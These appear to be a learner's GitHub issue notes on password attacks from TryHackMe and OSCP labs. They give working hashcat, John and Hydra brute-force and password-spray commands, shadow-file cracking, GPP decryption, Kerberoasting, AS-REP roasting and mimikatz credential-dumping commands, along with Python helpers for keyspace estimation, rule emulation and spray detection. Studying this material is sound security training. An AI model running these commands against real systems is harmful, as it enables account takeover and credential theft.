WDavid404 / Note_tryhackme


Password Attacks #6

Open WDavid404 opened 8 months ago

WDavid404 commented 8 months ago

Password Cracking vs. Password Guessing

Default Passwords

https://cirt.net/passwords
https://default-password.info/
https://datarecovery.com/rd/default-passwords/

Weak Passwords

https://wiki.skullsecurity.org/index.php?title=Passwords - This includes the most well-known collections of passwords.
SecLists - A huge collection of all kinds of lists, not only for password cracking.

Leaked Passwords

The following are some of the common password lists that have weak and leaked passwords, including the webhost, elitehacker, hak5, Hotmail, and PhpBB companies' leaks: SecLists/Passwords/Leaked-Databases

Combined wordlists

cat file1.txt file2.txt file3.txt > combined_list.txt
# sort then uniq removes duplicate entries (sort -u does the same); uniq -u would instead drop every line that appears more than once
sort combined_list.txt | uniq > cleaned_combined_list.txt

Customized Wordlists

cewl -w list.txt -d 5 -m 5 http://thm.labs

-w will write the contents to a file. In this case, list.txt.
-m 5 gathers strings (words) that are 5 characters or more
-d 5 is the depth level of web crawling/spidering (default 2)
http://thm.labs is the URL that will be used

Username Wordlists

username_generator: could help create a list with most of the possible combinations if we have a first name and last name.

git clone https://github.com/therodri2/username_generator.git

python3 username_generator.py -h  ---> shows the tool's help message and optional arguments.

echo "John Smith" > users.lst
python3 username_generator.py -w users.lst  --> to generate the possible combinations of the given full name.
WDavid404 commented 8 months ago

Keyspace Technique

crunch tool

crunch is one of many powerful tools for creating an offline wordlist. With crunch, we can specify numerous options, including min, max, and options. The following example creates a wordlist containing all possible combinations of 2 characters, including 0-4 and a-d. We can use the -o argument and specify a file to save the output to.

crunch 2 2 01234abcd -o crunch.txt

crunch also lets us specify a character set using the -t option to combine words of our choice. Here are some of the other options that could be used to help create different combinations of your choice:

@ - lower case alpha characters
, - upper case alpha characters
% - numeric characters
^ - special characters including space

For example, if part of the password is known to us, and we know it starts with pass and follows two numbers, we can use the % symbol from above to match the numbers. Here we generate a wordlist that contains pass followed by 2 numbers:

crunch 6 6 -t pass%%

CUPP - Common User Passwords Profiler

git clone https://github.com/Mebus/cupp.git
python3 cupp.py ---> see the available options
python3 cupp.py -i  --> interactive mode
python3 cupp.py -l  --> download pre-created wordlists
python3 cupp.py -a --> provide default usernames and passwords from the Alecto database
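Added example (my own Python, not the notes' or crunch's code): a small model of crunch's -t placeholder syntax and of plain `crunch MIN MAX CHARSET`, useful for estimating how big a keyspace a password policy leaves before any wordlist is written to disk. The special-character set behind `^` is an assumption; only its size matters here.

```python
import itertools
import string

# Placeholder classes as documented for crunch -t. The "^" set is an assumption:
# crunch's real special-character set is configurable, so only its size matters here.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,            # lower case alpha characters
    ",": string.ascii_uppercase,            # upper case alpha characters
    "%": string.digits,                     # numeric characters
    "^": "!@#$%^&*()-_+=[]{};:,.<>?/ ",     # special characters including space (assumed set)
}

def pattern_charsets(pattern):
    """Map each -t pattern position to its candidate characters; literal characters stay fixed."""
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]

def keyspace_size(pattern):
    """Number of candidates a -t pattern expands to (product of the per-position set sizes)."""
    size = 1
    for charset in pattern_charsets(pattern):
        size *= len(charset)
    return size

def charset_keyspace(min_len, max_len, charset):
    """Candidates for plain `crunch MIN MAX CHARSET` (no -t): sum of len(charset)**n over the lengths."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))

def expand(pattern):
    """Generate every candidate for a -t pattern; the rightmost position changes fastest."""
    for combo in itertools.product(*pattern_charsets(pattern)):
        yield "".join(combo)

if __name__ == "__main__":
    # The page's two examples: 2-char words over "01234abcd", and "pass" plus two digits.
    print(charset_keyspace(2, 2, "01234abcd"))                    # 81
    print(keyspace_size("pass%%"), list(expand("pass%%"))[:3])    # 100 ['pass00', 'pass01', 'pass02']
    # Mixing classes shows how fast the space grows: one extra special character per candidate.
    print(keyspace_size("pass%%^"))
```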
WDavid404 commented 8 months ago

Offline Attacks -- Dictionary attack

hashid or hash-identifier

hashid or hash-identifier: to identify the type of hash. https://www.kali.org/tools/hashid/

hashid '$2y$10$XrrpX8RD6IFvBwtzPuTlcOqJ8kO2px2xsh17f60GZsBKLeszsQTBC'
Note: when the hash contains special characters, wrap it in single quotes; double quotes will not work.

In Bash and zsh, single quotes (') and double quotes (") have different meanings. Single quotes preserve the literal value of all characters within the quotes, while double quotes allow for variable substitution, command substitution, and interpretation of certain escape sequences. For example, if you have a variable x=5, then echo '$x' will print $x, whereas echo "$x" will print 5.

hashcat

hashcat rules: https://hashcat.net/wiki/doku.php?id=rule_based_attack

hashcat and rule (from OSCP)

kali@kali:~/passwordattacks$ echo "\$1 c" > demo1.rule

kali@kali:~/passwordattacks$ cat demo1.rule     
$1 c

kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1
Iloveyou1
Princess1
Rockyou1
Abc1231

kali@kali:~/passwordattacks$ cat demo2.rule   
$1
c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
password1
Password
iloveyou1
Iloveyou
princess1
Princess
...

kali@kali:~/passwordattacks$ cat demo1.rule     
$1 c $!

kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1!
Iloveyou1!
Princess1!
Rockyou1!
Abc1231!

kali@kali:~/passwordattacks$ cat demo2.rule   
$! $1 c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
Password!1
Iloveyou!1
Princess!1
Rockyou!1
Abc123!1

Rule-based attack by hashcat (OSCP)

kali@kali:~/passwordattacks$ cat crackme.txt     
f621b6c9eab51a3e2f4e167fee4c6860

kali@kali:~/passwordattacks$ cat demo3.rule   
$1 c $!
$2 c $!
$1 $2 $3 c $!

kali@kali:~/passwordattacks$ hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force

rule files of hashcat

ls -la /usr/share/hashcat/rules/

hashcat: crack a hash (THM)

hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt

-a 0  sets the attack mode to a dictionary attack
-m 0  sets the hash mode for cracking MD5 hashes; for other types, run hashcat -h for a list of supported hashes.
f806fc5a2a0d5ba2471600758452799c this option could be a single hash like our example or a file that contains a hash or multiple hashes.
/usr/share/wordlists/rockyou.txt the wordlist/dictionary file for our attack
We run hashcat with --show option to show the cracked value if the hash has been cracked:
hashcat -a 0 -m 0 F806FC5A2A0D5BA2471600758452799C /usr/share/wordlists/rockyou.txt --show

Brute-Force attack by hashcat (THM)

hashcat -a 3 -m 0 05A5CF06982BA7892ED2A6D38FE832D6 ?d?d?d?d
05a5cf06982ba7892ed2a6d38fe832d6:2021
-a 3  sets the attacking mode as a brute-force attack
?d?d?d?d the ?d tells hashcat to use a digit. In our case, ?d?d?d?d for four digits starting with 0000 and ending at 9999
Other options
--stdout print the result to the terminal

John

Brute-force attack for hash by John

If you are using Kali, you can find it at /usr/share/wordlists/rockyou.txt. We will also have a crack.txt file with just the password hash: edba955d0ea15fdef4f61726ef97e5af507430c0. Then run:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass crack.txt

Rule-Based attacks by John.

Rule-Based attacks are also known as hybrid attacks. Rule-Based attacks assume the attacker knows something about the password policy.

Read /etc/john/john.conf and look for List.Rules to see all the available rules:

cat /etc/john/john.conf|grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF

Case: We will create a wordlist with only one password containing the string tryhackme by using rules:

john --wordlist=/tmp/single-password-list.txt --rules=best64 --stdout | wc -l
john --wordlist=single-password-list.txt --rules=KoreLogic --stdout |grep "Tryh@ckm3"

Custom Rules

We can add our rule to the end of john.conf:

user@machine$ sudo vi /etc/john/john.conf 
[List.Rules:THM-Password-Attacks] 
Az"[0-9]" ^[!@#$]

Explanation:
[List.Rules:THM-Password-Attacks]  specify the rule name THM-Password-Attacks.
Az represents a single word from the original wordlist/dictionary using -p.
"[0-9]" append a single digit (from 0 to 9) to the end of the word. For two digits, we can add "[0-9][0-9]"  and so on.  
^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.

Now let's create a file containing a single word, password, to see how we can expand our wordlist using this rule:

echo "password" > /tmp/single.lst

Use the customized rule:

user@machine$ john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout 
Using default input encoding: UTF-8 
!password0 
@password0 
#password0 
$password0

Write the output to a new wordlist file:
john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout > new_wordlist.lst

"No password hashes left to crack (see FAQ)" 【⚠️】

https://www.openwall.com/john/doc/FAQ.shtml

"All of the password hashes found in the file (that are of the same type as the very first recognized hash in the file unless you're using the "--format=..." option) might be already cracked by previous invocations of John. To display cracked passwords, use "john --show" on your password hash file(s)."

john --show crack.txt

To force John to crack those same hashes again, remove the john.pot file.

Crack shadow hash using John

┌──(kali㉿kali)-[~/Downloads]
└─$ cat passwd.txt
root:x:0:0:root:/root:/bin/bash

┌──(kali㉿kali)-[~/Downloads]
└─$ cat shadow.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7:::

└─$ unshadow passwd.txt shadow.txt > unshadowed.txt                

┌──(kali㉿kali)-[~/Downloads]
└─$ cat unshadowed.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:0:0:root:/root:/bin/bash

┌──(kali㉿kali)-[~/Downloads]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 

--->

Note!!:

If you get an error message such as 'no password hashes loaded (see FAQ)', you can try adding '--format=crypt':

john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

https://superuser.com/questions/1684358/john-the-ripper-on-kali-linux-it-outputs-no-password-hashes-loaded

remove .pot and .log

Remove the .pot and .log files and then try again:

rm .john/john.pot
rm .john/john.log
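Added example (my own Python, not the notes' or hashcat's code): a minimal emulator of the hashcat rule functions used in the demo1/demo2/demo3 rule files above ($X append, ^X prepend, c capitalize, l, u), producing the same --stdout ordering as the transcripts, plus a check of which rule-expanded candidate matches an MD5 (-m 0) hash. The word list and the target hash are constructed for the demo.

```python
import hashlib

def apply_rule(word, rule):
    """Apply one rule line (space-separated functions) left to right, as hashcat does."""
    for func in rule.split():
        op, arg = func[0], func[1:]
        if op == "$":              # $X : append character X
            word = word + arg
        elif op == "^":            # ^X : prepend character X
            word = arg + word
        elif op == "c":            # c  : capitalize the first letter, lowercase the rest
            word = word[:1].upper() + word[1:].lower()
        elif op == "l":            # l  : lowercase the whole word
            word = word.lower()
        elif op == "u":            # u  : uppercase the whole word
            word = word.upper()
        elif op == ":":            # :  : no-op, pass the word through unchanged
            pass
        else:
            raise ValueError("unsupported rule function: " + func)
    return word

def expand(words, rules):
    """Candidates in --stdout order: every rule applied to the first word, then the next word."""
    return [apply_rule(w, r) for w in words for r in rules]

def md5_hex(text):
    """MD5 of a candidate as hashcat -m 0 compares it (lowercase hex)."""
    return hashlib.md5(text.encode()).hexdigest()

def crack_md5(target_hex, words, rules):
    """Return (candidate, word, rule) for the first candidate hashing to target_hex, else None."""
    target = target_hex.lower()
    for w in words:
        for r in rules:
            cand = apply_rule(w, r)
            if md5_hex(cand) == target:
                return cand, w, r
    return None

WORDS = ["password", "iloveyou", "princess", "rockyou", "abc123"]  # constructed demo.txt
RULES = ["$1 c $!", "$2 c $!", "$1 $2 $3 c $!"]                    # the page's demo3.rule

if __name__ == "__main__":
    print(expand(WORDS[:2], ["$1", "c"]))   # ['password1', 'Password', 'iloveyou1', 'Iloveyou']
    # Constructed target: the MD5 of a candidate this word list and rule file produce.
    print(crack_md5(md5_hex("Princess123!"), WORDS, RULES))  # ('Princess123!', 'princess', '$1 $2 $3 c $!')
```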

WDavid404 commented 8 months ago

Online password attacks

Hydra

Hydra supports an extensive list of network services to attack. Using hydra, we'll brute-force network services such as web login pages, FTP, SMTP, and SSH in this section.

//FTP
hydra -L userlist.txt -P passwordlist.txt 192.168.0.107 ftp --> very time-consuming, not recommended
hydra -l <ftpuser> -P passwordlist.txt 192.168.0.107 ftp

//SMTP
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v 

//SSH
hydra -L users.lst -P /path/to/wordlist.txt ssh://10.10.x.x -v

// OSCP example for SSH
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
## -s: port
## -l: LOGIN. login with LOGIN name.

// OSCP example for RDP
Case where the password is known but the username is not:
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202

//Login page
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f 
or
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -t 32 -f -vV

(from OSCP)
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
Note: 'Login failed. Invalid' is the text shown on the page when the login fails

(from OSCP) For a web page that uses Basic auth, as in the figure below:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.201 http-get

Lesson:

An option like "-t 32" can be added to the hydra command to make it run faster.

Login page case:

Try entering arbitrary values in the username and password fields of the page; the URL shows that it sends a GET query to "/login-get/index.php?username=xxx&password=xxx", so try hydra:

hydra -l phillips -P clinic.lst 10.10.236.3 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

Note ⚠️: if the login request is a POST request, the command above must use http-post-form instead.

WDavid404 commented 8 months ago

Password spray attack

Scenario: the password (e.g. an initial password) and a set of usernames are known. For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.

SSH

hydra -L usernames-list.txt -p Spring2021 ssh://10.1.1.10

RDP

python3 RDPassSpray.py -u victim -p Spring2021! -t 10.100.10.240:3026

Outlook web access (OWA) portal

SMB
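Added example (my own Python, not part of the notes): the detection side of the spray pattern described above, run over constructed sshd-style auth log lines. A spray shows up as one source trying many distinct usernames with few attempts each, so the per-account lockout counters it is designed to avoid never fire; counting distinct usernames per source catches it. The log lines and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in OpenSSH "Failed/Accepted password" format (not real data).
SAMPLE_LOG = """\
Mar  1 09:00:01 srv sshd[101]: Failed password for invalid user alice from 10.1.1.50 port 4001 ssh2
Mar  1 09:00:02 srv sshd[102]: Failed password for bob from 10.1.1.50 port 4002 ssh2
Mar  1 09:00:03 srv sshd[103]: Failed password for carol from 10.1.1.50 port 4003 ssh2
Mar  1 09:00:04 srv sshd[104]: Failed password for invalid user dave from 10.1.1.50 port 4004 ssh2
Mar  1 09:00:05 srv sshd[105]: Failed password for erin from 10.1.1.50 port 4005 ssh2
Mar  1 09:00:06 srv sshd[106]: Accepted password for frank from 10.1.1.50 port 4006 ssh2
Mar  1 09:01:10 srv sshd[107]: Failed password for bob from 10.1.1.77 port 5001 ssh2
Mar  1 09:01:11 srv sshd[108]: Failed password for bob from 10.1.1.77 port 5002 ssh2
Mar  1 09:01:12 srv sshd[109]: Failed password for bob from 10.1.1.77 port 5003 ssh2
"""

LINE_RE = re.compile(
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

def parse(lines):
    """Yield (result, user, ip) for each line that matches the sshd auth format."""
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            yield m.group("result"), m.group("user"), m.group("ip")

def find_sprays(lines, min_users=5):
    """Sources whose failed logins span at least min_users distinct accounts (assumed threshold).

    A single account hammered many times (10.1.1.77 above) is the classic brute force
    and is NOT flagged here; that one trips per-account lockout instead."""
    users_by_ip = defaultdict(set)
    failures_by_ip = defaultdict(int)
    successes_by_ip = defaultdict(set)
    for result, user, ip in parse(lines):
        if result == "Failed":
            users_by_ip[ip].add(user)
            failures_by_ip[ip] += 1
        else:
            successes_by_ip[ip].add(user)   # a hit after a spray is the account to reset first
    return {
        ip: {"distinct_users": len(users), "failures": failures_by_ip[ip],
             "success_for": sorted(successes_by_ip[ip])}
        for ip, users in users_by_ip.items() if len(users) >= min_users
    }

if __name__ == "__main__":
    print(find_sprays(SAMPLE_LOG.splitlines()))
```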

WDavid404 commented 4 months ago

Cracking GPP passwords

Historically, system administrators often changed local workstation passwords through Group Policy Preferences (GPP). However, even though GPP-stored passwords are encrypted with AES-256, the private key for the encryption has been posted on MSDN. We can use this key to decrypt these encrypted passwords. In this case, we'll use the gpp-decrypt ruby script in Kali Linux that decrypts a given GPP encrypted string:

kali@kali:~$ gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
P@$$w0rd
WDavid404 commented 2 months ago

good hash crack webpage:

https://crackstation.net/

WDavid404 commented 3 weeks ago

hashcat mode

Atlassian hash

The Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes is 12001:

hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

AS-REP Roasting

Applies when "Do not require Kerberos preauthentication" is enabled on the account.

impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
hashcat -m 18200 <hashfile> <Wordlists> -r <rule> --force

Kerberoasting

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
hashcat -m 13100 <hashfile> <Wordlists> -r <rule> --force

mimikatz

privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /user:<Domain>\<TargetUsername>
hashcat -m 1000 <hashfile> <Wordlists> -r <rule> --force